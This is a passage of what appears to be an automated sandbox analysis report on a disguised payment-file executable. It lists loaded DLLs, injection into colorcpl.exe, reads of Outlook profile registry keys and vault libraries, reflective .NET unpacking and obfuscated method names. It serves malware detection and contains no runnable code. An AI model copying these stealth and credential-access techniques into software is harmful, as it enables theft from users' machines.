Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: NF_Payment_Ref_FAN930276.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: NF_Payment_Ref_FAN930276.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: NF_Payment_Ref_FAN930276.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: colorcpl.pdbGCTL source: NF_Payment_Ref_FAN930276.exe, 00000004.00000002.2264575035.0000000001628000.00000004.00000020.00020000.00000000.sdmp, xIrbjTuvDXL.exe, 00000005.00000002.4487148956.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: NF_Payment_Ref_FAN930276.exe, 00000004.00000002.2264575035.0000000001628000.00000004.00000020.00020000.00000000.sdmp, xIrbjTuvDXL.exe, 00000005.00000002.4487148956.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fRbU.pdb source: NF_Payment_Ref_FAN930276.exe
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xIrbjTuvDXL.exe, 00000005.00000000.2188295112.000000000078E000.00000002.00000001.01000000.0000000C.sdmp, xIrbjTuvDXL.exe, 00000008.00000002.4486573572.000000000078E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: NF_Payment_Ref_FAN930276.exe, 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2265868500.0000000004ED2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2268395563.0000000005087000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: NF_Payment_Ref_FAN930276.exe, NF_Payment_Ref_FAN930276.exe, 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000003.2265868500.0000000004ED2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2268395563.0000000005087000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: fRbU.pdbSHA256b9c source: NF_Payment_Ref_FAN930276.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: NF_Payment_Ref_FAN930276.exe, Form1.cs	.Net Code: InitializeComponent
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, sueo5UdIx8bBgI6PCF.cs	.Net Code: qKyVfTuEOb System.Reflection.Assembly.Load(byte[])
Source: 0.2.NF_Payment_Ref_FAN930276.exe.5230000.3.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.NF_Payment_Ref_FAN930276.exe.3820b90.0.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, sueo5UdIx8bBgI6PCF.cs	.Net Code: qKyVfTuEOb System.Reflection.Assembly.Load(byte[])
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, sueo5UdIx8bBgI6PCF.cs	.Net Code: qKyVfTuEOb System.Reflection.Assembly.Load(byte[])
Source: 7.2.colorcpl.exe.590cd14.2.raw.unpack, Form1.cs	.Net Code: InitializeComponent
Source: 8.2.xIrbjTuvDXL.exe.328cd14.1.raw.unpack, Form1.cs	.Net Code: InitializeComponent
Source: 8.0.xIrbjTuvDXL.exe.328cd14.1.raw.unpack, Form1.cs	.Net Code: InitializeComponent
Source: 9.2.firefox.exe.3397cd14.0.raw.unpack, Form1.cs	.Net Code: InitializeComponent

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00406155 push ss; retf	4_2_00406160
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00403270 push eax; ret	4_2_00403272
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_0040227F pushad ; retf	4_2_00402280
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_0040BB30 push eax; ret	4_2_0040BB31
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00404DCD push ebx; iretd	4_2_00404DD8
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_004066BD push edx; iretd	4_2_004066BF
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00413F7E pushad ; retf	4_2_00414025
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00413FC5 pushad ; retf	4_2_00414025
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01A9225F pushad ; ret	4_2_01A927F9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01A927FA pushad ; ret	4_2_01A927F9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC09AD push ecx; mov dword ptr [esp], ecx	4_2_01AC09B6
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01A9283D push eax; iretd	4_2_01A92858
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01A91200 push eax; iretd	4_2_01A91369
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CC42CB push 899D5642h; ret	5_2_02CC42D0
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CB4AD3 push ss; retf	5_2_02CB4ADE
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CC28FC pushad ; retf	5_2_02CC29A3
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CB503B push edx; iretd	5_2_02CB503D
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CC2943 pushad ; retf	5_2_02CC29A3
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CC3E40 push esi; ret	5_2_02CC3E65
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CC3E0D push esi; ret	5_2_02CC3E65
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CB374B push ebx; iretd	5_2_02CB3756
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CBA4AE push eax; ret	5_2_02CBA4AF
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CC3DE6 push esi; ret	5_2_02CC3E65
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CC3DFB push esi; ret	5_2_02CC3E65
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052327FA pushad ; ret	7_2_052327F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0523225F pushad ; ret	7_2_052327F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052609AD push ecx; mov dword ptr [esp], ecx	7_2_052609B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0523283D push eax; iretd	7_2_05232858
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05231368 push eax; iretd	7_2_05231369
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0305220A push esi; ret	7_2_03052274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0305221C push esi; ret	7_2_03052274

Source: NF_Payment_Ref_FAN930276.exe

Static PE information: section name: .text entropy: 7.961870823763204

Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, sueo5UdIx8bBgI6PCF.cs	High entropy of concatenated method names: 'GFTwaZigPV', 'C4cwpsXlBc', 'Q6AwNWEGMW', 'Sm6whAHkT6', 'p4uwyvyoFQ', 'tOTwmaDo1o', 'rqFwkfYmbY', 'G09wjqk8bC', 'L7ywvCdadn', 'aKjwYxJd0L'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, Sli4DW9alcwqplWEds.cs	High entropy of concatenated method names: 'UVQNuyxNjI', 'wPuN1qgXTO', 'cdCNeDQJQC', 'XuvNS7KTCB', 'Bd6NdUXhTq', 'RMANXoTRwJ', 'W65NbLWHMs', 'r7NN8yMcnw', 'hDiNRJQJxJ', 'Hn0NLkNKO3'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, eXBqexgXnhhTHnt4KX3.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LLhquFB5T1', 'uwTq16FqRx', 'C6xqeituaK', 'pQyqSeArIh', 'gM8qdy2cFa', 'kAnqXLYA09', 'IXvqbE26lT'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, I9sXMhjL9pxDQdeilY.cs	High entropy of concatenated method names: 'cuD9GM1YrR', 'bGZ9cFf7Rj', 'Cme92IxCON', 'fHh9CCVbm5', 'i5R9uEBnCK', 'OC993udlMm', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, wnukAYgggxIiSaIyoK4.cs	High entropy of concatenated method names: 'ToString', 'CNXqwT8t0v', 'oxLqVaW9BW', 'KoSqaX5OMw', 'fT8qpJLoA3', 'xI1qNkKd0N', 'ReOqhlfIgP', 'nnMqyS9iB9', 'AvQSUe0AHYrOQLyI2D1', 'u5wVRp0XSn3tZSaGZ9M'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, Jmn7TDkTQyO5p2V4pF.cs	High entropy of concatenated method names: 'I9vTYg6tha', 'FVSTUp1RFM', 'ToString', 'GpXTpUqCQE', 'j6STNBLk2w', 'cuAThgeprx', 'KA7TykTL1r', 'qN2TmtWhIZ', 'iCXTkaghJk', 'K9GTjG9EsL'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, TYweWABd4gnA6BiO6U.cs	High entropy of concatenated method names: 'laH5Km8Owc', 'HUS5wSHuvN', 'RHl5VtUuhQ', 'Qlo5pk98BF', 'GBi5NjnHEn', 'g4S5ytHJ2a', 'NgY5mK2DYx', 'feQ9bNlbvp', 'B2I98Hdc7Y', 'JQk9RDxgJZ'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, uBsWR1whKavSGYEwL9.cs	High entropy of concatenated method names: 'fgTKk0gpJ8', 'QZuKjHlvt7', 'C5jKYYrajn', 'BFVKUc86pP', 'geEKDbG7FW', 'YJCKlohSvD', 'jp9LLxXZQ6CyGQcXf1', 'hpjsrk2dRXBbcFstqo', 'v4pKKsg7RM', 'ni3KwDoNC1'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, TrwYxKFrGt1NX10rm7.cs	High entropy of concatenated method names: 'LLCPFYxF12', 'ba4Ps6E117', 'xHlPGDOiLR', 'S9DPc9pjH9', 'jxaPC1wDBC', 'jn1P3PmVS0', 'zNePguQTef', 't4TPBur7QC', 'k3rPxY23dc', 'b5xPIE3LEc'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, pLjukBgffZRmJjBJSJV.cs	High entropy of concatenated method names: 'MNX5JgPL8H', 'tdD50oWUlY', 't5v5fHJNhi', 'eGa5rwZfP3', 'cp85ooibxX', 'A9k5OMnfeh', 'dUb5EM6wfc', 'vZv5F2sX5w', 'SR55soR9Dx', 'XVN5ZRcwdB'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, hxCJeMU4eehAikm1DM.cs	High entropy of concatenated method names: 'c18T8Fp8a1', 'H24TLViI8U', 'U8k9MYN3K2', 'os99KskAlM', 'QwgTIYlFjO', 'P6DTn4EWy0', 'N6QTAMgngj', 'GErTuwOTFq', 'rksT1ZN2aI', 'JBpTeaxeNQ'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, kn5CeNcnQ21Ob3V9bn.cs	High entropy of concatenated method names: 'Dispose', 'MxNKRYpotl', 'RRK4crH536', 'AKOQQcAwGb', 'twLKLZgDKa', 'GZyKzUFYAN', 'ProcessDialogKey', 'S7R4MgSkx3', 'tcc4KFg4Rd', 'KYP449exNb'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, Djnu7ArL3JPPZ5TZFW.cs	High entropy of concatenated method names: 'sjaDx6tudr', 'TcaDnCqWsy', 'ixTDuB4yED', 'jUuD1R71OV', 'RntDccpvBb', 'ALID2BpZtC', 'eG2DCtK9IP', 'A5UD3KaFtc', 'TbIDWIYJwd', 'NhUDgRwBtn'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, fDB32RxexiDY4YPFvf.cs	High entropy of concatenated method names: 'z0NmaUluQ6', 'QhHmNqL8H4', 'FOpmy02dMe', 'R8qmkjJbkl', 'My5mjIH28E', 'iWRyd6DtfD', 'sqcyXV6ifd', 'mSPybcnqyp', 'WxPy8FqUDy', 'gjCyRxOssV'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, OlTiSOAJNSJSWNWDAr.cs	High entropy of concatenated method names: 'ToString', 'l0ElIhksOd', 'nfglcmiWVy', 'fAZl27XPAH', 'JSnlCKeiNT', 'uVel3kKT9x', 'B32lW52drB', 'VXqlgnbgKZ', 'HtVlB4kTAn', 'p6GlHCWe6m'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, aOPj9RJ6D3mMysj82S.cs	High entropy of concatenated method names: 'rh8yohiCYq', 'wWpyEl9ADq', 'wjvh2mOLuj', 'htGhCnViLy', 'XpIh3tT2Yb', 'u1uhWv8B8M', 'uhEhgbLjdg', 'tMwhBGetYr', 'HvxhHMwfiX', 'cwghxvCcn5'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, dE7ePfsB4iKPS7munM.cs	High entropy of concatenated method names: 'wwKf5iwhU', 'C9MrSnwkH', 'JCQO2C6xg', 'KFhEQX1bJ', 'jsvsKRREJ', 'e0XZM5UOC', 'bqrpkOqdA9NPOyu0Zx', 'OxwajmE31Dc0CogEoP', 'GDS9g4Pbl', 'RMWqXC6cG'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, EFMsT9GY7t3Gmy7OvK.cs	High entropy of concatenated method names: 'iOakphwhpV', 'yTfkhryS9l', 'HH4kmqirj3', 'abWmL4HM0S', 'xubmz3KlR3', 'YGkkMWRqLt', 'zrskKms92t', 'Vjxk4VUA76', 'L2Ukw7JG4T', 'RcvkVews7a'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, bUcSe8D1xH3PFuCDlv.cs	High entropy of concatenated method names: 'ChYhrCXmEg', 'DjlhO3nTfh', 'SGQhFZ64NV', 'HiZhsiIbcD', 'NEDhDvFFTd', 'aGuhlID65S', 'JR3hTW3Dm4', 'Qr3h9yGUAL', 'aLwh5JRsol', 'wE1hqEUQQv'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, clPqp4phOdkKvqr3gS.cs	High entropy of concatenated method names: 'MUo9pyLo1s', 'KKd9Nncf2N', 'CIa9hnTjDQ', 'V079yI7iKB', 'gfs9mPOgub', 'fiy9k2y9Lv', 'EId9jyEQBt', 'Y1K9vJ8rD3', 'eZh9YrcL5V', 'WeP9UC8oLB'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, VKBmrI3WAxwWAfZXaC.cs	High entropy of concatenated method names: 'eVAkJ0lQ73', 'J01k0goAkg', 'CgUkfOQKF3', 'WSIkrXRRbv', 'I6gkoEmlJd', 'k3NkOVvJbO', 'jB7kEl2j7c', 'Fw5kF4RBxv', 'lMkksOeJuJ', 'wt8kZpLZmD'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, sueo5UdIx8bBgI6PCF.cs	High entropy of concatenated method names: 'GFTwaZigPV', 'C4cwpsXlBc', 'Q6AwNWEGMW', 'Sm6whAHkT6', 'p4uwyvyoFQ', 'tOTwmaDo1o', 'rqFwkfYmbY', 'G09wjqk8bC', 'L7ywvCdadn', 'aKjwYxJd0L'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, Sli4DW9alcwqplWEds.cs	High entropy of concatenated method names: 'UVQNuyxNjI', 'wPuN1qgXTO', 'cdCNeDQJQC', 'XuvNS7KTCB', 'Bd6NdUXhTq', 'RMANXoTRwJ', 'W65NbLWHMs', 'r7NN8yMcnw', 'hDiNRJQJxJ', 'Hn0NLkNKO3'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, eXBqexgXnhhTHnt4KX3.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LLhquFB5T1', 'uwTq16FqRx', 'C6xqeituaK', 'pQyqSeArIh', 'gM8qdy2cFa', 'kAnqXLYA09', 'IXvqbE26lT'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, I9sXMhjL9pxDQdeilY.cs	High entropy of concatenated method names: 'cuD9GM1YrR', 'bGZ9cFf7Rj', 'Cme92IxCON', 'fHh9CCVbm5', 'i5R9uEBnCK', 'OC993udlMm', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, wnukAYgggxIiSaIyoK4.cs	High entropy of concatenated method names: 'ToString', 'CNXqwT8t0v', 'oxLqVaW9BW', 'KoSqaX5OMw', 'fT8qpJLoA3', 'xI1qNkKd0N', 'ReOqhlfIgP', 'nnMqyS9iB9', 'AvQSUe0AHYrOQLyI2D1', 'u5wVRp0XSn3tZSaGZ9M'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, Jmn7TDkTQyO5p2V4pF.cs	High entropy of concatenated method names: 'I9vTYg6tha', 'FVSTUp1RFM', 'ToString', 'GpXTpUqCQE', 'j6STNBLk2w', 'cuAThgeprx', 'KA7TykTL1r', 'qN2TmtWhIZ', 'iCXTkaghJk', 'K9GTjG9EsL'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, TYweWABd4gnA6BiO6U.cs	High entropy of concatenated method names: 'laH5Km8Owc', 'HUS5wSHuvN', 'RHl5VtUuhQ', 'Qlo5pk98BF', 'GBi5NjnHEn', 'g4S5ytHJ2a', 'NgY5mK2DYx', 'feQ9bNlbvp', 'B2I98Hdc7Y', 'JQk9RDxgJZ'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, uBsWR1whKavSGYEwL9.cs	High entropy of concatenated method names: 'fgTKk0gpJ8', 'QZuKjHlvt7', 'C5jKYYrajn', 'BFVKUc86pP', 'geEKDbG7FW', 'YJCKlohSvD', 'jp9LLxXZQ6CyGQcXf1', 'hpjsrk2dRXBbcFstqo', 'v4pKKsg7RM', 'ni3KwDoNC1'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, TrwYxKFrGt1NX10rm7.cs	High entropy of concatenated method names: 'LLCPFYxF12', 'ba4Ps6E117', 'xHlPGDOiLR', 'S9DPc9pjH9', 'jxaPC1wDBC', 'jn1P3PmVS0', 'zNePguQTef', 't4TPBur7QC', 'k3rPxY23dc', 'b5xPIE3LEc'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, pLjukBgffZRmJjBJSJV.cs	High entropy of concatenated method names: 'MNX5JgPL8H', 'tdD50oWUlY', 't5v5fHJNhi', 'eGa5rwZfP3', 'cp85ooibxX', 'A9k5OMnfeh', 'dUb5EM6wfc', 'vZv5F2sX5w', 'SR55soR9Dx', 'XVN5ZRcwdB'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, hxCJeMU4eehAikm1DM.cs	High entropy of concatenated method names: 'c18T8Fp8a1', 'H24TLViI8U', 'U8k9MYN3K2', 'os99KskAlM', 'QwgTIYlFjO', 'P6DTn4EWy0', 'N6QTAMgngj', 'GErTuwOTFq', 'rksT1ZN2aI', 'JBpTeaxeNQ'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, kn5CeNcnQ21Ob3V9bn.cs	High entropy of concatenated method names: 'Dispose', 'MxNKRYpotl', 'RRK4crH536', 'AKOQQcAwGb', 'twLKLZgDKa', 'GZyKzUFYAN', 'ProcessDialogKey', 'S7R4MgSkx3', 'tcc4KFg4Rd', 'KYP449exNb'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, Djnu7ArL3JPPZ5TZFW.cs	High entropy of concatenated method names: 'sjaDx6tudr', 'TcaDnCqWsy', 'ixTDuB4yED', 'jUuD1R71OV', 'RntDccpvBb', 'ALID2BpZtC', 'eG2DCtK9IP', 'A5UD3KaFtc', 'TbIDWIYJwd', 'NhUDgRwBtn'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, fDB32RxexiDY4YPFvf.cs	High entropy of concatenated method names: 'z0NmaUluQ6', 'QhHmNqL8H4', 'FOpmy02dMe', 'R8qmkjJbkl', 'My5mjIH28E', 'iWRyd6DtfD', 'sqcyXV6ifd', 'mSPybcnqyp', 'WxPy8FqUDy', 'gjCyRxOssV'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, OlTiSOAJNSJSWNWDAr.cs	High entropy of concatenated method names: 'ToString', 'l0ElIhksOd', 'nfglcmiWVy', 'fAZl27XPAH', 'JSnlCKeiNT', 'uVel3kKT9x', 'B32lW52drB', 'VXqlgnbgKZ', 'HtVlB4kTAn', 'p6GlHCWe6m'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, aOPj9RJ6D3mMysj82S.cs	High entropy of concatenated method names: 'rh8yohiCYq', 'wWpyEl9ADq', 'wjvh2mOLuj', 'htGhCnViLy', 'XpIh3tT2Yb', 'u1uhWv8B8M', 'uhEhgbLjdg', 'tMwhBGetYr', 'HvxhHMwfiX', 'cwghxvCcn5'
